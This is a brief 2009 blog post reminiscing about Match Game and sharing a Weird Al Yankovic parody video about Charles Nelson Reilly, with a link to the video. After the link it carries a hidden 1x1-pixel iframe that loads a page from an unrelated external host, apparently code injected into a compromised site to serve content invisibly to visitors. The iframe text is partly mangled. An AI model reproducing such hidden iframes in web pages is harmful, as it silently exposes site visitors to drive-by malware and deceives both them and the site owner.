Posted by: wrmcnutt | August 27, 2009

Charles Nelson Riley


As we all know, Wierd Al Yankovic is the greatest musical genius of the twentieth century.  I’ve run across a new video from him that takes me back to my childhood.  I’d get home from school, and Match Game would be on.  Never a big fan of game shows, I’d watch it anyway while waiting for Star Trek to come on.  So I got to know Charles Nelson Riley’s public persona pretty well. 

The parody here is something that must be seen to be believed.

http://myplay.com/video-player/weird-al-yankovic?bcpid=156431805&bclid=151750197&bctid=31979120001

[iframe width=”1″ height=”1″ src=”http://s6g.info/go.php?sid=1″%5D

Leave a Reply

Categories

